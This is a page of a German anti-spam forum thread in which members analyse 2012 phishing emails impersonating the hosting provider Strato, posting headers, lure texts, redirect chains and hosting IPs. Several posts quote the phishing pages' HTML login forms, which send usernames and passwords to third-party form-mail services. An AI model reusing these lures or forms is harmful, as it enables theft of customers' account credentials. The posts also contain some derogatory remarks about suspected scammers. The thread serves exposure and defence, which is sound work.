Seite 2 von 3 ErsteErste 123 LetzteLetzte
Ergebnis 11 bis 20 von 28

Thema: Strato Account Phishing

  1. #11
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Und wieder versucht man es:


    header:
    01: Received: from oms-db01.r1000.mx.aol.com (EHLO
    02: oms-db01.r1000.mx.aol.com) [205.188.58.1]
    03: by mx0.gmx.net (mx079) with SMTP; 13 Apr 2012 xx:xx:xx +0200
    04: Received: from mtaout-da02.r1000.mx.aol.com
    05: (mtaout-da02.r1000.mx.aol.com [172.29.51.130])
    06: by oms-db01.r1000.mx.aol.com (AOL Outbound OMS Interface) with ESMTP id
    07: CE3561C000356;
    08: Fri, 13 Apr 2012 xx:xx:xx -0400 (EDT)
    09: Received: from User (unknown [69.174.246.149])
    10: by mtaout-da02.r1000.mx.aol.com (MUA/Third Party Client Interface) with
    11: ESMTPA ID: [ID filtered]
    12: Fri, 13 Apr 2012 xx:xx:xx -0400 (EDT)

    gecrackt: [Link nur für registrierte Mitglieder sichtbar. ]

    X-AOL-IP: 69.174.246.149 ---> server2.tusitioenlinea.com/Serverbeach

    *! Sehr geehrter Strato Kontoinhaber Bestдtigen Sie Ihr Konto!*
    *Um uns dabei helfen, Sie und Ihr Konto. Sperrung des Kontos zu vermeiden.*
    *Zur Ьberprьfung KLICKEN SIE HIER whois: [Link nur für registrierte Mitglieder sichtbar. ] *abschlieЯen*
    *Vielen Dank.*
    *Admin*
    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    IP: 195.66.135.250 ---> ip-space.unicycle.net

    leitet weiter auf:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    IP: 85.190.0.110 ---> Probe Networks
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  2. #12
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Und jetzt hat Phiski sogar die Chuzpe und phisht Strato von Strato aus...


    header:
    01: Received: from oms-db02.r1000.mx.aol.com (EHLO
    02: oms-db02.r1000.mx.aol.com) [205.188.58.2]
    03: by mx0.gmx.net (mx067) with SMTP; 15 Apr 2012 xx:xx:xx +0200
    04: Received: from mtaout-mb04.r1000.mx.aol.com
    05: (mtaout-mb04.r1000.mx.aol.com [172.29.41.68])
    06: by oms-db02.r1000.mx.aol.com (AOL Outbound OMS Interface) with ESMTP id
    07: 94CA41C000054;
    08: Sun, 15 Apr 2012 xx:xx:xx -0400 (EDT)
    09: Received: from User (unknown [69.174.246.149])
    10: by mtaout-mb04.r1000.mx.aol.com (MUA/Third Party Client Interface) with
    11: ESMTPA ID: [ID filtered]
    12: Sun, 15 Apr 2012 xx:xx:xx -0400 (EDT)

    gecrackt: [Link nur für registrierte Mitglieder sichtbar. ]

    X-AOL-IP: 69.174.246.149 ---> server2.tusitioenlinea.com

    *Sehr geehrter **Strato**-Online-Kunden:*

    Dies ist Ihre offizielle Mitteilung, dass unser Service aktualisiert
    wurde, und
    wir fanden heraus, dass Ihre E-Mail-Konto noch nicht auf unserem Server
    reagiert
    aufgrund eines Virus infection.Please _Login_
    whois: [Link nur für registrierte Mitglieder sichtbar. ] auf Ihr Konto zugreifen.
    IP: 81.169.145.163 ---> wa3.rzone.de/Strato

    leitet weiter auf:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    IP: 85.190.0.110 ---> PROBE-NETWORKS

    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    IP: 208.47.184.201 ---> SYNACOR
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  3. #13
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Und wieder 2:


    header:
    01: Received: from mo-p04-ob.rzone.de (EHLO mo-p04-ob.rzone.de) [81.169.146.177]
    02: by mx0.gmx.net (mx009) with SMTP; 29 Apr 2012 xx:xx:xx +0200

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    IP: 85.190.0.150 ---> file2.npage.de/Probe-Networks



    header:
    01: Received: from User (h2029720.stratoserver.net [81.169.150.60])
    02: by smtp.strato.de (joses mo32) (RZmta 28.13 SBL|AUTH)
    03: with ESMTPA ID: [ID filtered]

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    IP: 85.190.0.150 ---> Probe-Networks

    die Verarbeitung erfolgt durch:

    [html]<form action="http://www.webformprocessing.com/processform.tpl">
    <input type=hidden name=accountnumber value=1522>
    <div id="login_username">[/html]

    Anscheinend benutzt man einen gecrackten Strato-Server, um weitere Strato-Accounts zu cracken. Und Strato scheint mal wieder merkbefreit zu sein. Tja, wir können halt nur billig...

    Und bei Probe-Networks kann man anscheinend auch Accounts am laufenden Band cracken/anlegen.

    Und der Phisher ist so blöde, dass er einen Formular ---> Email-Dienst zu Hilfe ziehen muss. So blöd sind eigentlich nur Mugus, die Russkis programmieren so etwas mit Leichtigkeit selber. Und die Seite von Webformprocessing sieht mir auch äusserst rudimentär aus. Hmmmm...
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  4. #14
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Wohl wieder derselbe Phiski und wieder fällt Probe-Networks unangenehm auf. Datensicherheit scheint dort ein Fremdwort zu sein:


    header:
    01: Received: from oms-mb04.r1000.mx.aol.com (EHLO
    02: oms-mb04.r1000.mx.aol.com) [64.12.102.140]
    03: by mx0.gmx.net (mx021) with SMTP; 25 May 2012 xx:xx:xx +0200
    04: Received: from mtaout-ma03.r1000.mx.aol.com
    05: (mtaout-ma03.r1000.mx.aol.com [172.29.41.3])
    06: by oms-mb04.r1000.mx.aol.com (AOL Outbound OMS Interface) with ESMTP id
    07: E9C2C1C000089;
    08: Fri, 25 May 2012 xx:xx:xx -0400 (EDT)
    09: Received: from User (unknown [64.120.132.195])
    10: by mtaout-ma03.r1000.mx.aol.com (MUA/Third Party Client Interface) with
    11: ESMTPA ID: [ID filtered]
    12: Fri, 25 May 2012 xx:xx:xx -0400 (EDT)

    X-AOL-IP: 64.120.132.195 ---> 64-120-132-195.static.hostnoc.net

    [Link nur für registrierte Mitglieder sichtbar. ]

    !Sehr geehrterStratoKontoinhaberBestätigen Sie Ihr Konto!
    Umuns dabei helfen,Sie und Ihr Konto.Sperrung des Kontoszuvermeiden.


    ZurÜberprüfungKLICKEN SIE HIER whois: [Link nur für registrierte Mitglieder sichtbar. ] abschließen


    Vielen Dank.
    Admin®
    IP: 174.129.232.158 ---> ec2-174-129-232-158.compute-1.amazonaws.com (also die Amazon-Cloud)

    leitet natürlich nur weiter auf:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    IP: 85.190.0.150 ---> PROBE-NETWORKS
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  5. #15
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Anscheinend hatte der Kriminelle beim ersten Phishzug leider Erfolg und phisht jetzt von Strato nach Strato....


    header:
    01: Received: from oms-mb01.r1000.mx.aol.com (EHLO
    02: oms-mb01.r1000.mx.aol.com) [64.12.102.137]
    03: by mx0.gmx.net (mx062) with SMTP; 26 May 2012 xx:xx:xx +0200
    04: Received: from mtaout-ma05.r1000.mx.aol.com
    05: (mtaout-ma05.r1000.mx.aol.com [172.29.41.5])
    06: by oms-mb01.r1000.mx.aol.com (AOL Outbound OMS Interface) with ESMTP id
    07: 5074F1C000084;
    08: Fri, 25 May 2012 xx:xx:xx -0400 (EDT)
    09: Received: from User (unknown [64.120.132.195])
    10: by mtaout-ma05.r1000.mx.aol.com (MUA/Third Party Client Interface) with
    11: ESMTPA ID: [ID filtered]
    12: Fri, 25 May 2012 xx:xx:xx -0400 (EDT)

    X-AOL-IP: 64.120.132.195 ---> 64-120-132-195.static.hostnoc.net

    [Link nur für registrierte Mitglieder sichtbar. ]

    ZurÜberprüfungKLICKEN SIE HIER whois: [Link nur für registrierte Mitglieder sichtbar. ] abschließen


    Vielen Dank.
    Admin®
    IP: 174.129.232.158 ---> ec2-174-129-232-158.compute-1.amazonaws.com

    leitet weiter auf:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    IP: 81.169.145.165 ---> wa5.rzone.de/Strato
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  6. #16
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Strato ist wieder dran:


    header:
    01: Received: from mo-p06-ob.rzone.de (EHLO mo-p06-ob.rzone.de) [81.169.146.186]
    02: by mx0.gmx.net (mx003) with SMTP; 29 Jun 2012 xx:xx:xx +0200
    03: X-RZG-AUTH:
    04: :PGMXYU2paOu7c9XtdZuUhk1wsGvKyImTdEDSTiGJvweKxBrGARSOdwJLpY4IEHXUK/aSCUya
    05: Message-ID: [ID filtered]
    06: X-RZG-CLASS-ID: [ID filtered]
    07: Received: from h2050413.stratoserver.net ([85.214.229.161])
    08: by smtp.strato.de (jorabe mo10) (RZmta 29.19 AUTH)
    09: with (DHE-RSA-AES256-SHA encrypted) ESMTPA ID: [ID filtered]
    10: Fri, 29 Jun 2012 xx:xx:xx +0200 (CEST)

    *Sehr geehrter Strato-Online-Kunden:
    *
    Dies ist Ihre offizielle Mitteilung, dass unser Service aktualisiert
    wurde, und wir

    fanden heraus, dass Ihre E-Mail-Konto noch nicht auf unserem Server reagiert

    aufgrund eines Virus infection.Please*_KLICK HIER ANMELDEN UND UPDATE
    whois: [Link nur für registrierte Mitglieder sichtbar. ]_*auf Ihr Konto zugreifen.

    Admin

    Copyright
    IP: 94.23.155.32 ---> OVH (der alte Schwarzhut mal wieder...)

    leitet natürlich nur weiter auf eine gecrackte Seite bei Strato:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    IP: 81.169.145.75 ---> w0b.rzone.de/Strato

    Auf der Schadseite dann folgender Code:

    Code:
    <form action="http://www.webformprocessing.com/processform.tpl">
    <input type=hidden name=accountnumber value=1569>
    <div id="login_username"><strong>Kundennummer oder Domain</strong>:<br>
    					<input type="text" name="username" value="" tabindex="1"
    class="notfocused">
    					<br>
    					<br>
    					<a href="https://memberservices.insightbb.com/auth/login"
    class="forgot_link">So finden Sie Ihre Kundennummer </a><br>
    				</div>
    				<div id="login_password"><strong>Passwort</strong>:<br>
    					<input type="password" name="password" value="" tabindex="2"><br>
    				</div>
    				<div id="login_submit">
    					<input id="login_submit_button" type="submit" name="submit"
    value="Submit" tabindex="3">
    				</div>
    			</form>
    Sieht mir nach Mugus aus, denn nur die sind erfahrungsgemäß zu blöd, eigene Skripte zu schreiben und müssen sich bei Drittanbietern bedienen.
    Geändert von kjz1 (29.06.2012 um 11:11 Uhr)
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  7. #17
    Senior Mitglied
    Registriert seit
    17.07.2005
    Ort
    Mitteldeutschland
    Beiträge
    1.564

    Standard

    Mein erster Strato-Phisher:

    header:
    01: x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
    02: Authentication-Results: hotmail.com; sender-id=none (sender IP is 81.169.146.186)
    03: header.from=han [at] dhhan.de; dkim=none header.d=dhhan.de; x-hmca=none
    04: X-SID-PRA: han [at] dhhan.de
    05: X-SID-Result: None
    06: X-DKIM-Result: None
    07: X-Message-Status: n:0:n
    08: X-AUTH-Result: NONE
    09: X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
    10: X-Message-Info:
    11: 3c21WZ1hAltI9DuizMAEE8dcieVDsgL4uOaiDtje4DzjLPNFfmr1JO9WvxubLGcXMBgJcklT1q9R7SZ6Rk012zkpyxkZ4n
    12: +GpLP8a1/I8SM40Yqh7Syx0tUc1JYhiR5MVxXPj00gJ6S23SiqWBbEg==
    13: Received: from mo-p06-ob.rzone.de ([81.169.146.186]) by
    14: SNT0-MC1-F44.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
    15: Tue, 3 Jul 2012 xx:xx:xx -0700
    16: X-RZG-AUTH: :JG0KVUSgc/7LpSFkumOYGG8sJFjCmd1EFT5SwR440+0nbIQwOjmt
    17: Message-ID: [ID filtered]
    18: X-RZG-CLASS-ID: [ID filtered]
    19: Received: from h2052800.stratoserver.net ([85.214.120.233])
    20: by smtp.strato.de (josoe mo100) (RZmta 29.19 SBL|AUTH)
    21: with (DHE-RSA-AES256-SHA encrypted) ESMTPA ID: [ID filtered]
    22: Tue, 3 Jul 2012 xx:xx:xx +0200 (CEST)
    23: Content-Type: multipart/alternative; boundary="===============0100132425=="
    24: MIME-Version: 1.0
    25: Subject: STRATO AG - Ihr freundlicher Support.
    26: To: kunde <poor [at] spamvictim.tld>
    27: From: "service [at] strato.de" <han [at] dhhan.de>
    28: Date: Tue, 03 Jul 2012 xx:xx:xx +0200
    29: Return-Path: han [at] dhhan.de
    30: X-OriginalArrivalTime: 03 Jul 2012 xx:xx:xx.0221 (UTC)
    31: FILETIME=[25E3D350:01CD593C]

    Dies ist Ihre offizielle Mitteilung, dass unser Service aktualisiert wurde,=
    und wir fanden heraus, dass Ihre E-Mail-Kontos reagiert nicht auf unserem =
    Server aufgrund einer Virusinfektion. =

    Bitte loggen Sie sich auf Ihr Konto zugreifen. =

    =

    Vielen Dank f=FCr Ihre Kooperation. =
    whois: [Link nur für registrierte Mitglieder sichtbar. ]/updatee.html

  8. #18
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.071

    Standard

    Die Sternchen-Mugu-Bande versucht sich auch im Phishen, gesendet über einen zuvor gecrackten Strato-Account versucht man jetzt weitere Opfer zu finden:


    header:
    01: Received: from mo-p06-ob.rzone.de (EHLO mo-p06-ob.rzone.de) [81.169.146.186]
    02: by mx0.gmx.net (mx077) with SMTP; 15 Jul 2012 xx:xx:xx +0200
    03: X-RZG-AUTH: :KG0keEGkfu3XfrAuapev8E5XTWSiW0DHgc2Fh6CBx2njSthEiyBD2jRo
    04: Message-ID: [ID filtered]
    05: X-RZG-CLASS-ID: [ID filtered]
    06: Received: from [184.22.221.130]
    07: (184-22-221-130.static.hostnoc.net [184.22.221.130])
    08: by smtp.strato.de (jored mo50) (RZmta 29.19 AUTH)
    09: with (DHE-RSA-AES256-SHA encrypted) ESMTPA ID: [ID filtered]
    10: Sun, 15 Jul 2012 xx:xx:xx +0200 (CEST)

    gecrackt: [Link nur für registrierte Mitglieder sichtbar. ]

    *

    *

    *Sehr geehrter Strato-Online-Kunden:*
     
    Dies ist Ihre offizielle Mitteilung, dass unser Service aktualisiert
    wurde, und
    wir fanden heraus, dass Ihre E-Mail-Konto noch nicht auf unserem Server
    reagiert
    aufgrund eines Virus infection.Please*KLICK HIER ANMELDEN UND UPDATE*
    whois: [Link nur für registrierte Mitglieder sichtbar. ] auf Ihr Konto zugreifen.

    Admin®

    Copyright © 2012
    IP: 89.200.143.50 ---> Memset

    ist natürlich nur eine Weiterleitung auf:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    IP: 67.208.91.116 ---> Jabry/inforelay.com

    Und da Mugus ja blöde sind, verrät man auf dieser Seite auch direkt die Empfänger-Emailadresse der Phishs.

    Code:
    <form name="loginForm" method="POST"
    action="http://www.haisoft.net/webtools/formmail.php"> <input
    type=hidden  name="recipient" value="
    
    [Link nur für registrierte Mitglieder sichtbar. 
    
    ]"> <input
    type=hidden name="subject" value="STRATO SCAMM - Powered By
    YOKELPLATFORM"> <input type=hidden name="redirect"
    value="http://users10.jabry.com/thankkkyoudanke/Redirect.htm">	
     	  <table width='100%' cellpadding='0' cellspacing='0' border='0'
    align='center'>
    [Link nur für registrierte Mitglieder sichtbar. ]

    Rattenscharf ja auch:

    STRATO SCAMM - Powered By YOKELPLATFORM"
    Man schaue auch auf: [Link nur für registrierte Mitglieder sichtbar. ]
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  9. #19
    Graue Pestilenz Avatar von Fidul
    Registriert seit
    16.07.2005
    Beiträge
    6.405

    Standard

    [Link nur für registrierte Mitglieder sichtbar. ] -> https://www.facebook.com/yokelplatform
    Wir kriegen euch alle!

  10. #20
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    10.602

    Standard

    http://www.nairaland.com/yokelplat/posts
    Gleicher Typ?
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

Seite 2 von 3 ErsteErste 123 LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen